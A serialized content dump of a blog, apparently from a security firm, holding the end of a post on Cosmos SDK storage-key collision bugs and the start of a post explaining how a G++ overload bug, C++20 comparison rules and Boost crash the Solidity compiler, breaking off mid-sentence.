values\n",{"type":27,"tag":207,"props":96421,"children":96422},{"class":209,"line":7996},[96423],{"type":27,"tag":207,"props":96424,"children":96425},{"style":238},[96426],{"type":33,"value":451},{"type":27,"tag":36,"props":96428,"children":96429},{},[96430,96432,96438,96439,96445,96447,96452,96454,96459,96461,96466,96468,96473,96475,96481],{"type":33,"value":96431},"By now, you may have already noticed that this implementation suffers from field malleability issues. Imagine a scenario where both ",{"type":27,"tag":84,"props":96433,"children":96435},{"className":96434},[],[96436],{"type":33,"value":96437},"vaultId = 1",{"type":33,"value":1131},{"type":27,"tag":84,"props":96440,"children":96442},{"className":96441},[],[96443],{"type":33,"value":96444},"vaultId = 10",{"type":33,"value":96446}," coexist. If we try to fetch data under ",{"type":27,"tag":84,"props":96448,"children":96450},{"className":96449},[],[96451],{"type":33,"value":96437},{"type":33,"value":96453},", all entries under ",{"type":27,"tag":84,"props":96455,"children":96457},{"className":96456},[],[96458],{"type":33,"value":96444},{"type":33,"value":96460}," will also be returned simply because ",{"type":27,"tag":84,"props":96462,"children":96464},{"className":96463},[],[96465],{"type":33,"value":1651},{"type":33,"value":96467}," is a prefix of ",{"type":27,"tag":84,"props":96469,"children":96471},{"className":96470},[],[96472],{"type":33,"value":1866},{"type":33,"value":96474},". To fix this, we must once again append the ",{"type":27,"tag":84,"props":96476,"children":96478},{"className":96477},[],[96479],{"type":33,"value":96480},"Separator",{"type":33,"value":96482}," to the iterator prefix.",{"type":27,"tag":101,"props":96484,"children":96486},{"code":96485,"language":83397,"meta":7,"className":83398,"style":7},"i := sdk.KVStorePrefixIterator(\n kvStore,\n fmt.Sprintf(\"%s%d%s\", PositionMapPrefix, vaultId, Seperator),\n)\n",[96487],{"type":27,"tag":84,"props":96488,"children":96489},{"__ignoreMap":7},[96490,96517,96529,96582],{"type":27,"tag":207,"props":96491,"children":96492},{"class":209,"line":210},[96493,96497,96501,96505,96509,96513],{"type":27,"tag":207,"props":96494,"children":96495},{"style":220},[96496],{"type":33,"value":4690},{"type":27,"tag":207,"props":96498,"children":96499},{"style":226},[96500],{"type":33,"value":83648},{"type":27,"tag":207,"props":96502,"children":96503},{"style":220},[96504],{"type":33,"value":85872},{"type":27,"tag":207,"props":96506,"children":96507},{"style":238},[96508],{"type":33,"value":1041},{"type":27,"tag":207,"props":96510,"children":96511},{"style":1335},[96512],{"type":33,"value":95676},{"type":27,"tag":207,"props":96514,"children":96515},{"style":238},[96516],{"type":33,"value":9090},{"type":27,"tag":207,"props":96518,"children":96519},{"class":209,"line":244},[96520,96525],{"type":27,"tag":207,"props":96521,"children":96522},{"style":220},[96523],{"type":33,"value":96524}," kvStore",{"type":27,"tag":207,"props":96526,"children":96527},{"style":238},[96528],{"type":33,"value":1842},{"type":27,"tag":207,"props":96530,"children":96531},{"class":209,"line":270},[96532,96537,96541,96545,96549,96554,96558,96562,96566,96570,96574,96578],{"type":27,"tag":207,"props":96533,"children":96534},{"style":220},[96535],{"type":33,"value":96536}," fmt",{"type":27,"tag":207,"props":96538,"children":96539},{"style":238},[96540],{"type":33,"value":1041},{"type":27,"tag":207,"props":96542,"children":96543},{"style":1335},[96544],{"type":33,"value":92446},{"type":27,"tag":207,"props":96546,"children":96547},{"style":238},[96548],{"type":33,"value":1343},{"type":27,"tag":207,"props":96550,"children":96551},{"style":1325},[96552],{"type":33,"value":96553},"\"%s%d%s\"",{"type":27,"tag":207,"props":96555,"children":96556},{"style":238},[96557],{"type":33,"value":1123},{"type":27,"tag":207,"props":96559,"children":96560},{"style":220},[96561],{"type":33,"value":95726},{"type":27,"tag":207,"props":96563,"children":96564},{"style":238},[96565],{"type":33,"value":1123},{"type":27,"tag":207,"props":96567,"children":96568},{"style":220},[96569],{"type":33,"value":95511},{"type":27,"tag":207,"props":96571,"children":96572},{"style":238},[96573],{"type":33,"value":1123},{"type":27,"tag":207,"props":96575,"children":96576},{"style":220},[96577],{"type":33,"value":95842},{"type":27,"tag":207,"props":96579,"children":96580},{"style":238},[96581],{"type":33,"value":14018},{"type":27,"tag":207,"props":96583,"children":96584},{"class":209,"line":296},[96585],{"type":27,"tag":207,"props":96586,"children":96587},{"style":238},[96588],{"type":33,"value":10449},{"type":27,"tag":36,"props":96590,"children":96591},{},[96592,96594,96599],{"type":33,"value":96593},"At first, identifying these serialization issues may seem easy. Once data structures and ",{"type":27,"tag":84,"props":96595,"children":96597},{"className":96596},[],[96598],{"type":33,"value":92200},{"type":33,"value":96600}," usage grow increasingly more complex, developers can unintentionally overlook storage key parsing mistakes.",{"type":27,"tag":36,"props":96602,"children":96603},{},[96604],{"type":33,"value":96605},"Storage keys continue to be a tedious and persistent issue when building on Cosmos. It is crucial to approach development with awareness and care to prevent bugs from creeping into code.",{"type":27,"tag":58,"props":96607,"children":96609},{"id":96608},"real-world-examples-5",[96610],{"type":33,"value":83920},{"type":27,"tag":36,"props":96612,"children":96613},{},[96614,96615,96620,96622,96629,96631,96637],{"type":33,"value":23888},{"type":27,"tag":84,"props":96616,"children":96618},{"className":96617},[],[96619],{"type":33,"value":85693},{"type":33,"value":96621}," previously lacked protection against KVStore ",{"type":27,"tag":47,"props":96623,"children":96626},{"href":96624,"rel":96625},"https://github.com/cosmos/cosmos-sdk/pull/9363",[51],[96627],{"type":33,"value":96628},"key collisions",{"type":33,"value":96630},". This prior oversight allowed developers to unintentionally create two ",{"type":27,"tag":84,"props":96632,"children":96634},{"className":96633},[],[96635],{"type":33,"value":96636},"KVStores",{"type":33,"value":96638}," that were not independent of each other.",{"type":27,"tag":36,"props":96640,"children":96641},{},[96642],{"type":27,"tag":47,"props":96643,"children":96646},{"href":96644,"rel":96645},"https://github.com/cosmos/cosmos-sdk/blob/25bd118e4cc1d60ab2f9d2e0302d271416551aa9/types/store.go#L108",[51],[96647],{"type":33,"value":83970},{"type":27,"tag":101,"props":96649,"children":96651},{"code":96650,"language":83397,"meta":7,"className":83398,"style":7},"func NewKVStoreKeys(names ...string) map[string]*KVStoreKey {\n keys := make(map[string]*KVStoreKey)\n for _, name := range names {\n keys[name] = NewKVStoreKey(name)\n }\n\n return keys\n}\n",[96652],{"type":27,"tag":84,"props":96653,"children":96654},{"__ignoreMap":7},[96655,96717,96765,96801,96841,96848,96855,96867],{"type":27,"tag":207,"props":96656,"children":96657},{"class":209,"line":210},[96658,96662,96667,96671,96676,96680,96684,96688,96692,96696,96700,96704,96708,96713],{"type":27,"tag":207,"props":96659,"children":96660},{"style":214},[96661],{"type":33,"value":2085},{"type":27,"tag":207,"props":96663,"children":96664},{"style":1335},[96665],{"type":33,"value":96666}," NewKVStoreKeys",{"type":27,"tag":207,"props":96668,"children":96669},{"style":238},[96670],{"type":33,"value":1343},{"type":27,"tag":207,"props":96672,"children":96673},{"style":220},[96674],{"type":33,"value":96675},"names",{"type":27,"tag":207,"props":96677,"children":96678},{"style":226},[96679],{"type":33,"value":32564},{"type":27,"tag":207,"props":96681,"children":96682},{"style":8920},[96683],{"type":33,"value":36928},{"type":27,"tag":207,"props":96685,"children":96686},{"style":238},[96687],{"type":33,"value":2222},{"type":27,"tag":207,"props":96689,"children":96690},{"style":214},[96691],{"type":33,"value":74335},{"type":27,"tag":207,"props":96693,"children":96694},{"style":238},[96695],{"type":33,"value":11019},{"type":27,"tag":207,"props":96697,"children":96698},{"style":8920},[96699],{"type":33,"value":36928},{"type":27,"tag":207,"props":96701,"children":96702},{"style":238},[96703],{"type":33,"value":22686},{"type":27,"tag":207,"props":96705,"children":96706},{"style":226},[96707],{"type":33,"value":9286},{"type":27,"tag":207,"props":96709,"children":96710},{"style":8920},[96711],{"type":33,"value":96712},"KVStoreKey",{"type":27,"tag":207,"props":96714,"children":96715},{"style":238},[96716],{"type":33,"value":384},{"type":27,"tag":207,"props":96718,"children":96719},{"class":209,"line":244},[96720,96725,96729,96733,96737,96741,96745,96749,96753,96757,96761],{"type":27,"tag":207,"props":96721,"children":96722},{"style":220},[96723],{"type":33,"value":96724}," keys",{"type":27,"tag":207,"props":96726,"children":96727},{"style":226},[96728],{"type":33,"value":83648},{"type":27,"tag":207,"props":96730,"children":96731},{"style":1335},[96732],{"type":33,"value":92787},{"type":27,"tag":207,"props":96734,"children":96735},{"style":238},[96736],{"type":33,"value":1343},{"type":27,"tag":207,"props":96738,"children":96739},{"style":214},[96740],{"type":33,"value":74335},{"type":27,"tag":207,"props":96742,"children":96743},{"style":238},[96744],{"type":33,"value":11019},{"type":27,"tag":207,"props":96746,"children":96747},{"style":8920},[96748],{"type":33,"value":36928},{"type":27,"tag":207,"props":96750,"children":96751},{"style":238},[96752],{"type":33,"value":22686},{"type":27,"tag":207,"props":96754,"children":96755},{"style":226},[96756],{"type":33,"value":9286},{"type":27,"tag":207,"props":96758,"children":96759},{"style":8920},[96760],{"type":33,"value":96712},{"type":27,"tag":207,"props":96762,"children":96763},{"style":238},[96764],{"type":33,"value":10449},{"type":27,"tag":207,"props":96766,"children":96767},{"class":209,"line":270},[96768,96772,96776,96780,96784,96788,96792,96797],{"type":27,"tag":207,"props":96769,"children":96770},{"style":376},[96771],{"type":33,"value":10321},{"type":27,"tag":207,"props":96773,"children":96774},{"style":220},[96775],{"type":33,"value":10326},{"type":27,"tag":207,"props":96777,"children":96778},{"style":238},[96779],{"type":33,"value":1123},{"type":27,"tag":207,"props":96781,"children":96782},{"style":220},[96783],{"type":33,"value":55737},{"type":27,"tag":207,"props":96785,"children":96786},{"style":226},[96787],{"type":33,"value":83648},{"type":27,"tag":207,"props":96789,"children":96790},{"style":376},[96791],{"type":33,"value":84630},{"type":27,"tag":207,"props":96793,"children":96794},{"style":220},[96795],{"type":33,"value":96796}," names",{"type":27,"tag":207,"props":96798,"children":96799},{"style":238},[96800],{"type":33,"value":384},{"type":27,"tag":207,"props":96802,"children":96803},{"class":209,"line":296},[96804,96808,96812,96816,96820,96824,96829,96833,96837],{"type":27,"tag":207,"props":96805,"children":96806},{"style":220},[96807],{"type":33,"value":32596},{"type":27,"tag":207,"props":96809,"children":96810},{"style":238},[96811],{"type":33,"value":11019},{"type":27,"tag":207,"props":96813,"children":96814},{"style":220},[96815],{"type":33,"value":55737},{"type":27,"tag":207,"props":96817,"children":96818},{"style":238},[96819],{"type":33,"value":15942},{"type":27,"tag":207,"props":96821,"children":96822},{"style":226},[96823],{"type":33,"value":10380},{"type":27,"tag":207,"props":96825,"children":96826},{"style":1335},[96827],{"type":33,"value":96828}," NewKVStoreKey",{"type":27,"tag":207,"props":96830,"children":96831},{"style":238},[96832],{"type":33,"value":1343},{"type":27,"tag":207,"props":96834,"children":96835},{"style":220},[96836],{"type":33,"value":55737},{"type":27,"tag":207,"props":96838,"children":96839},{"style":238},[96840],{"type":33,"value":10449},{"type":27,"tag":207,"props":96842,"children":96843},{"class":209,"line":445},[96844],{"type":27,"tag":207,"props":96845,"children":96846},{"style":238},[96847],{"type":33,"value":10645},{"type":27,"tag":207,"props":96849,"children":96850},{"class":209,"line":867},[96851],{"type":27,"tag":207,"props":96852,"children":96853},{"emptyLinePlaceholder":19},[96854],{"type":33,"value":2062},{"type":27,"tag":207,"props":96856,"children":96857},{"class":209,"line":892},[96858,96862],{"type":27,"tag":207,"props":96859,"children":96860},{"style":376},[96861],{"type":33,"value":8986},{"type":27,"tag":207,"props":96863,"children":96864},{"style":220},[96865],{"type":33,"value":96866}," keys\n",{"type":27,"tag":207,"props":96868,"children":96869},{"class":209,"line":1475},[96870],{"type":27,"tag":207,"props":96871,"children":96872},{"style":238},[96873],{"type":33,"value":451},{"type":27,"tag":36,"props":96875,"children":96876},{},[96877,96879,96884,96886,96891,96893,96898],{"type":33,"value":96878},"Thanks to the diligence of core developers, checks are now enforced and the ",{"type":27,"tag":84,"props":96880,"children":96882},{"className":96881},[],[96883],{"type":33,"value":85693},{"type":33,"value":96885}," will refuse to run if any ",{"type":27,"tag":84,"props":96887,"children":96889},{"className":96888},[],[96890],{"type":33,"value":92200},{"type":33,"value":96892}," keys are prefix of each other. This implementation alleviates developers from having to worry about key collisions on the ",{"type":27,"tag":84,"props":96894,"children":96896},{"className":96895},[],[96897],{"type":33,"value":92200},{"type":33,"value":96899}," level.",{"type":27,"tag":36,"props":96901,"children":96902},{},[96903,96905,96912],{"type":33,"value":96904},"Additional storage key issues like subtle bugs in the Cosmos-SDK have resulted in ",{"type":27,"tag":47,"props":96906,"children":96909},{"href":96907,"rel":96908},"https://github.com/cosmos/cosmos-sdk/issues/12661",[51],[96910],{"type":33,"value":96911},"incorrect iterator behavior",{"type":33,"value":1041},{"type":27,"tag":36,"props":96914,"children":96915},{},[96916,96918,96925],{"type":33,"value":96917},"Notably, gradual adoption of the ",{"type":27,"tag":47,"props":96919,"children":96922},{"href":96920,"rel":96921},"https://github.com/cosmos/cosmos-sdk/tree/def657dafa615cb8e8bb072452663893157e073a/collections",[51],[96923],{"type":33,"value":96924},"collections",{"type":33,"value":96926}," storage helpers since Cosmos v0.50 has made it a lot more difficult to write buggy code. This demonstrates the importance of keeping up to date with the latest SDK development to leverage architectural security improvements.",{"type":27,"tag":28,"props":96928,"children":96929},{"id":10112},[96930],{"type":33,"value":10115},{"type":27,"tag":36,"props":96932,"children":96933},{},[96934],{"type":33,"value":96935},"The Cosmos SDK is a powerful tool for those who want to create custom blockchains. However, this flexibility brings about great responsibility. Developers must pay close attention to nuances, as these can expose a large number of potential attack surfaces.",{"type":27,"tag":36,"props":96937,"children":96938},{},[96939],{"type":33,"value":96940},"To recap, we discussed some of the more basic parts of Cosmos-SDK, showcasing common mistakes developers tend to make. Yet, it is important to note that we've only covered the tip of the iceberg. Other attack surfaces, such as authentications in relation to the IBC interface, are fundamentals absolutely worth looking into.",{"type":27,"tag":10127,"props":96942,"children":96943},{},[96944],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":96946},[96947,96948,96951,96954,96957,96960,96963,96966],{"id":30,"depth":244,"text":34},{"id":83114,"depth":244,"text":83117,"children":96949},[96950],{"id":83917,"depth":270,"text":83920},{"id":84513,"depth":244,"text":84516,"children":96952},[96953],{"id":85162,"depth":270,"text":83920},{"id":85659,"depth":244,"text":85662,"children":96955},[96956],{"id":86959,"depth":270,"text":83920},{"id":88295,"depth":244,"text":88298,"children":96958},[96959],{"id":88833,"depth":270,"text":83920},{"id":90352,"depth":244,"text":90355,"children":96961},[96962],{"id":91232,"depth":270,"text":83920},{"id":92186,"depth":244,"text":92189,"children":96964},[96965],{"id":96608,"depth":270,"text":83920},{"id":10112,"depth":244,"text":10115},"content:blog:2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security.md","blog/2025-06-10-cosmos-security",{"_path":96971,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":96972,"description":96973,"author":96974,"image":96975,"date":96977,"tags":96978,"isFeatured":19,"onBlogPage":19,"body":96979,"_type":10152,"_id":99686,"_source":10154,"_file":99687,"_stem":99688,"_extension":10157},"/blog/2025-08-11-compiler-bug-causes-compiler-bug","Compiler Bug Causes Compiler Bug: How a 12-Year-Old G++ Bug Took Down Solidity","A subtle G++ bug from 2012, C++20's new comparison rules, and legacy Boost code can collide to crash Solidity's compiler on valid code. We unpack the surprising chain reaction and how to fix it.","kiprey",{"src":96976,"height":18,"width":18},"/posts/compiler-bug-causes-compiler-bug/title.png","2025-08-11",[11757,36276],{"type":24,"children":96980,"toc":99670},[96981,96986,97122,97127,97132,97137,97142,97255,97260,97265,97270,97310,97323,97328,97346,97351,97354,97360,97374,97387,97392,97405,97410,97422,97435,97440,97443,97449,97455,97512,97517,97523,97537,97572,97580,97588,97608,97614,97619,98058,98066,98110,98115,98123,98131,98170,98175,98183,98188,98191,98197,98203,98228,98240,98267,98300,98305,98308,98314,98333,98851,98864,98882,98905,98916,98921,99024,99029,99034,99048,99053,99129,99147,99152,99155,99161,99173,99185,99525,99530,99548,99553,99556,99562,99567,99585,99605,99608,99614,99633,99636,99640,99645,99656,99661,99666],{"type":27,"tag":36,"props":96982,"children":96983},{},[96984],{"type":33,"value":96985},"Compilers aren't supposed to crash — especially not when compiling perfectly valid code like this:",{"type":27,"tag":101,"props":96987,"children":96989},{"code":96988,"language":11757,"meta":7,"className":11758,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n function a() public pure returns (uint256) {\n return 1 ** 2;\n }\n}\n",[96990],{"type":27,"tag":84,"props":96991,"children":96992},{"__ignoreMap":7},[96993,97001,97019,97026,97043,97084,97108,97115],{"type":27,"tag":207,"props":96994,"children":96995},{"class":209,"line":210},[96996],{"type":27,"tag":207,"props":96997,"children":96998},{"style":4647},[96999],{"type":33,"value":97000},"// SPDX-License-Identifier: UNLICENSED\n",{"type":27,"tag":207,"props":97002,"children":97003},{"class":209,"line":244},[97004,97009,97014],{"type":27,"tag":207,"props":97005,"children":97006},{"style":376},[97007],{"type":33,"value":97008},"pragma",{"type":27,"tag":207,"props":97010,"children":97011},{"style":214},[97012],{"type":33,"value":97013}," solidity",{"type":27,"tag":207,"props":97015,"children":97016},{"style":238},[97017],{"type":33,"value":97018}," ^0.8.25;\n",{"type":27,"tag":207,"props":97020,"children":97021},{"class":209,"line":270},[97022],{"type":27,"tag":207,"props":97023,"children":97024},{"emptyLinePlaceholder":19},[97025],{"type":33,"value":2062},{"type":27,"tag":207,"props":97027,"children":97028},{"class":209,"line":296},[97029,97034,97039],{"type":27,"tag":207,"props":97030,"children":97031},{"style":214},[97032],{"type":33,"value":97033},"contract",{"type":27,"tag":207,"props":97035,"children":97036},{"style":8920},[97037],{"type":33,"value":97038}," A",{"type":27,"tag":207,"props":97040,"children":97041},{"style":238},[97042],{"type":33,"value":384},{"type":27,"tag":207,"props":97044,"children":97045},{"class":209,"line":445},[97046,97051,97055,97059,97063,97068,97072,97076,97080],{"type":27,"tag":207,"props":97047,"children":97048},{"style":214},[97049],{"type":33,"value":97050}," function",{"type":27,"tag":207,"props":97052,"children":97053},{"style":1335},[97054],{"type":33,"value":223},{"type":27,"tag":207,"props":97056,"children":97057},{"style":238},[97058],{"type":33,"value":21319},{"type":27,"tag":207,"props":97060,"children":97061},{"style":214},[97062],{"type":33,"value":68907},{"type":27,"tag":207,"props":97064,"children":97065},{"style":214},[97066],{"type":33,"value":97067}," pure",{"type":27,"tag":207,"props":97069,"children":97070},{"style":376},[97071],{"type":33,"value":83226},{"type":27,"tag":207,"props":97073,"children":97074},{"style":238},[97075],{"type":33,"value":686},{"type":27,"tag":207,"props":97077,"children":97078},{"style":8920},[97079],{"type":33,"value":53410},{"type":27,"tag":207,"props":97081,"children":97082},{"style":238},[97083],{"type":33,"value":1424},{"type":27,"tag":207,"props":97085,"children":97086},{"class":209,"line":867},[97087,97091,97095,97100,97104],{"type":27,"tag":207,"props":97088,"children":97089},{"style":376},[97090],{"type":33,"value":23019},{"type":27,"tag":207,"props":97092,"children":97093},{"style":232},[97094],{"type":33,"value":235},{"type":27,"tag":207,"props":97096,"children":97097},{"style":226},[97098],{"type":33,"value":97099}," **",{"type":27,"tag":207,"props":97101,"children":97102},{"style":232},[97103],{"type":33,"value":438},{"type":27,"tag":207,"props":97105,"children":97106},{"style":238},[97107],{"type":33,"value":241},{"type":27,"tag":207,"props":97109,"children":97110},{"class":209,"line":892},[97111],{"type":27,"tag":207,"props":97112,"children":97113},{"style":238},[97114],{"type":33,"value":10645},{"type":27,"tag":207,"props":97116,"children":97117},{"class":209,"line":1475},[97118],{"type":27,"tag":207,"props":97119,"children":97120},{"style":238},[97121],{"type":33,"value":451},{"type":27,"tag":36,"props":97123,"children":97124},{},[97125],{"type":33,"value":97126},"Yet running Solidity's compiler (solc) on this file on a standard Ubuntu 22.04 system (G++ 11.4, Boost 1.74) causes an immediate segmentation fault.",{"type":27,"tag":36,"props":97128,"children":97129},{},[97130],{"type":33,"value":97131},"At first, this seemed absurd. The code just returns 1 to the power of 2 — no memory tricks, unsafe casting, or undefined behavior.",{"type":27,"tag":36,"props":97133,"children":97134},{},[97135],{"type":33,"value":97136},"And yet, it crashes.",{"type":27,"tag":36,"props":97138,"children":97139},{},[97140],{"type":33,"value":97141},"Another minimal example?",{"type":27,"tag":101,"props":97143,"children":97145},{"code":97144,"language":11757,"meta":7,"className":11758,"style":7},"// SPDX-License-Identifier: UNLICENSED\npragma solidity ^0.8.25;\n\ncontract A {\n function a() public pure {\n uint256[1] data;\n }\n}\n",[97146],{"type":27,"tag":84,"props":97147,"children":97148},{"__ignoreMap":7},[97149,97156,97171,97178,97193,97220,97241,97248],{"type":27,"tag":207,"props":97150,"children":97151},{"class":209,"line":210},[97152],{"type":27,"tag":207,"props":97153,"children":97154},{"style":4647},[97155],{"type":33,"value":97000},{"type":27,"tag":207,"props":97157,"children":97158},{"class":209,"line":244},[97159,97163,97167],{"type":27,"tag":207,"props":97160,"children":97161},{"style":376},[97162],{"type":33,"value":97008},{"type":27,"tag":207,"props":97164,"children":97165},{"style":214},[97166],{"type":33,"value":97013},{"type":27,"tag":207,"props":97168,"children":97169},{"style":238},[97170],{"type":33,"value":97018},{"type":27,"tag":207,"props":97172,"children":97173},{"class":209,"line":270},[97174],{"type":27,"tag":207,"props":97175,"children":97176},{"emptyLinePlaceholder":19},[97177],{"type":33,"value":2062},{"type":27,"tag":207,"props":97179,"children":97180},{"class":209,"line":296},[97181,97185,97189],{"type":27,"tag":207,"props":97182,"children":97183},{"style":214},[97184],{"type":33,"value":97033},{"type":27,"tag":207,"props":97186,"children":97187},{"style":8920},[97188],{"type":33,"value":97038},{"type":27,"tag":207,"props":97190,"children":97191},{"style":238},[97192],{"type":33,"value":384},{"type":27,"tag":207,"props":97194,"children":97195},{"class":209,"line":445},[97196,97200,97204,97208,97212,97216],{"type":27,"tag":207,"props":97197,"children":97198},{"style":214},[97199],{"type":33,"value":97050},{"type":27,"tag":207,"props":97201,"children":97202},{"style":1335},[97203],{"type":33,"value":223},{"type":27,"tag":207,"props":97205,"children":97206},{"style":238},[97207],{"type":33,"value":21319},{"type":27,"tag":207,"props":97209,"children":97210},{"style":214},[97211],{"type":33,"value":68907},{"type":27,"tag":207,"props":97213,"children":97214},{"style":214},[97215],{"type":33,"value":97067},{"type":27,"tag":207,"props":97217,"children":97218},{"style":238},[97219],{"type":33,"value":384},{"type":27,"tag":207,"props":97221,"children":97222},{"class":209,"line":867},[97223,97228,97232,97236],{"type":27,"tag":207,"props":97224,"children":97225},{"style":8920},[97226],{"type":33,"value":97227}," uint256",{"type":27,"tag":207,"props":97229,"children":97230},{"style":238},[97231],{"type":33,"value":11019},{"type":27,"tag":207,"props":97233,"children":97234},{"style":232},[97235],{"type":33,"value":1651},{"type":27,"tag":207,"props":97237,"children":97238},{"style":238},[97239],{"type":33,"value":97240},"] data;\n",{"type":27,"tag":207,"props":97242,"children":97243},{"class":209,"line":892},[97244],{"type":27,"tag":207,"props":97245,"children":97246},{"style":238},[97247],{"type":33,"value":10645},{"type":27,"tag":207,"props":97249,"children":97250},{"class":209,"line":1475},[97251],{"type":27,"tag":207,"props":97252,"children":97253},{"style":238},[97254],{"type":33,"value":451},{"type":27,"tag":36,"props":97256,"children":97257},{},[97258],{"type":33,"value":97259},"Still crashes.",{"type":27,"tag":36,"props":97261,"children":97262},{},[97263],{"type":33,"value":97264},"So what’s going on?",{"type":27,"tag":36,"props":97266,"children":97267},{},[97268],{"type":33,"value":97269},"We traced it down to a seemingly unrelated C++ line deep in the compiler backend:",{"type":27,"tag":101,"props":97271,"children":97273},{"code":97272,"language":8876,"meta":7,"className":8877,"style":7},"if (*lengthValue == 0) { ... }\n",[97274],{"type":27,"tag":84,"props":97275,"children":97276},{"__ignoreMap":7},[97277],{"type":27,"tag":207,"props":97278,"children":97279},{"class":209,"line":210},[97280,97284,97288,97292,97297,97301,97305],{"type":27,"tag":207,"props":97281,"children":97282},{"style":376},[97283],{"type":33,"value":9023},{"type":27,"tag":207,"props":97285,"children":97286},{"style":238},[97287],{"type":33,"value":686},{"type":27,"tag":207,"props":97289,"children":97290},{"style":226},[97291],{"type":33,"value":9286},{"type":27,"tag":207,"props":97293,"children":97294},{"style":238},[97295],{"type":33,"value":97296},"lengthValue ",{"type":27,"tag":207,"props":97298,"children":97299},{"style":226},[97300],{"type":33,"value":15856},{"type":27,"tag":207,"props":97302,"children":97303},{"style":232},[97304],{"type":33,"value":4680},{"type":27,"tag":207,"props":97306,"children":97307},{"style":238},[97308],{"type":33,"value":97309},") { ... }\n",{"type":27,"tag":36,"props":97311,"children":97312},{},[97313,97315,97321],{"type":33,"value":97314},"That single comparison — a ",{"type":27,"tag":84,"props":97316,"children":97318},{"className":97317},[],[97319],{"type":33,"value":97320},"boost::rational",{"type":33,"value":97322}," compared to 0 — causes infinite recursion in G++ \u003C 14 when compiled under C++20. And the resulting stack overflow crashes solc.",{"type":27,"tag":36,"props":97324,"children":97325},{},[97326],{"type":33,"value":97327},"This post unpacks how this happened — and why none of the individual components are technically \"broken\":",{"type":27,"tag":1228,"props":97329,"children":97330},{},[97331,97336,97341],{"type":27,"tag":1232,"props":97332,"children":97333},{},[97334],{"type":33,"value":97335},"A 12-year-old overload resolution bug in G++",{"type":27,"tag":1232,"props":97337,"children":97338},{},[97339],{"type":33,"value":97340},"An outdated symmetric comparison pattern in Boost",{"type":27,"tag":1232,"props":97342,"children":97343},{},[97344],{"type":33,"value":97345},"A subtle but impactful rewrite rule in C++20",{"type":27,"tag":36,"props":97347,"children":97348},{},[97349],{"type":33,"value":97350},"Put together, they form a perfect storm — one that takes down Solidity compilation on default Linux setups, even though your code is perfectly fine.",{"type":27,"tag":26063,"props":97352,"children":97353},{},[],{"type":27,"tag":28,"props":97355,"children":97357},{"id":97356},"background-the-setup",[97358],{"type":33,"value":97359},"Background: The Setup",{"type":27,"tag":36,"props":97361,"children":97362},{},[97363,97365,97372],{"type":33,"value":97364},"If you follow the ",{"type":27,"tag":47,"props":97366,"children":97369},{"href":97367,"rel":97368},"https://docs.soliditylang.org/en/v0.8.30/installing-solidity.html#building-from-source",[51],[97370],{"type":33,"value":97371},"Solidity build documentation (v0.8.30)",{"type":33,"value":97373},", you'll see it recommends:",{"type":27,"tag":1228,"props":97375,"children":97376},{},[97377,97382],{"type":27,"tag":1232,"props":97378,"children":97379},{},[97380],{"type":33,"value":97381},"Boost ≥ 1.67",{"type":27,"tag":1232,"props":97383,"children":97384},{},[97385],{"type":33,"value":97386},"GCC ≥ 11",{"type":27,"tag":36,"props":97388,"children":97389},{},[97390],{"type":33,"value":97391},"Ubuntu 22.04, for example, ships with:",{"type":27,"tag":1228,"props":97393,"children":97394},{},[97395,97400],{"type":27,"tag":1232,"props":97396,"children":97397},{},[97398],{"type":33,"value":97399},"G++ 11.4.0",{"type":27,"tag":1232,"props":97401,"children":97402},{},[97403],{"type":33,"value":97404},"Boost 1.74.0",{"type":27,"tag":36,"props":97406,"children":97407},{},[97408],{"type":33,"value":97409},"So far, so good.",{"type":27,"tag":36,"props":97411,"children":97412},{},[97413,97415,97420],{"type":33,"value":97414},"However, Solidity enabled ",{"type":27,"tag":12606,"props":97416,"children":97417},{},[97418],{"type":33,"value":97419},"C++20",{"type":33,"value":97421}," in January 2025:",{"type":27,"tag":10222,"props":97423,"children":97424},{},[97425],{"type":27,"tag":36,"props":97426,"children":97427},{},[97428],{"type":27,"tag":47,"props":97429,"children":97432},{"href":97430,"rel":97431},"https://github.com/ethereum/solidity/commit/233a5081835a04939ccf85dfb5286c0b53d23c66",[51],[97433],{"type":33,"value":97434},"Enable C++20 in Solidity",{"type":27,"tag":36,"props":97436,"children":97437},{},[97438],{"type":33,"value":97439},"This wasn't accompanied by an update to the versions of dependencies in the documentation. As we'll soon see, that's what opened the trapdoor.",{"type":27,"tag":26063,"props":97441,"children":97442},{},[],{"type":27,"tag":28,"props":97444,"children":97446},{"id":97445},"part-i-a-12-year-old-g-bug-in-overload-resolution",[97447],{"type":33,"value":97448},"Part I: A 12-Year-Old G++ Bug in Overload Resolution",{"type":27,"tag":58,"props":97450,"children":97452},{"id":97451},"whats-overload-resolution",[97453],{"type":33,"value":97454},"What’s Overload Resolution?",{"type":27,"tag":36,"props":97456,"children":97457},{},[97458,97460,97466,97468,97474,97476,97481,97483,97488,97490,97496,97498,97503,97504,97510],{"type":33,"value":97459},"In C++, when you write an expression like ",{"type":27,"tag":84,"props":97461,"children":97463},{"className":97462},[],[97464],{"type":33,"value":97465},"a == b",{"type":33,"value":97467},", the compiler chooses among available ",{"type":27,"tag":84,"props":97469,"children":97471},{"className":97470},[],[97472],{"type":33,"value":97473},"operator==",{"type":33,"value":97475}," implementations by comparing their ",{"type":27,"tag":12606,"props":97477,"children":97478},{},[97479],{"type":33,"value":97480},"match quality",{"type":33,"value":97482},". A ",{"type":27,"tag":12606,"props":97484,"children":97485},{},[97486],{"type":33,"value":97487},"member function",{"type":33,"value":97489}," like ",{"type":27,"tag":84,"props":97491,"children":97493},{"className":97492},[],[97494],{"type":33,"value":97495},"a.operator==(b)",{"type":33,"value":97497}," usually has higher priority than a ",{"type":27,"tag":12606,"props":97499,"children":97500},{},[97501],{"type":33,"value":97502},"non-member function",{"type":33,"value":97489},{"type":27,"tag":84,"props":97505,"children":97507},{"className":97506},[],[97508],{"type":33,"value":97509},"operator==(a, b)",{"type":33,"value":97511}," — unless the types differ too much or are ambiguous.",{"type":27,"tag":36,"props":97513,"children":97514},{},[97515],{"type":33,"value":97516},"That’s the rule. But G++ didn’t always follow it.",{"type":27,"tag":58,"props":97518,"children":97520},{"id":97519},"the-bug",[97521],{"type":33,"value":97522},"The Bug",{"type":27,"tag":36,"props":97524,"children":97525},{},[97526,97528,97535],{"type":33,"value":97527},"In 2012, a bug was filed: 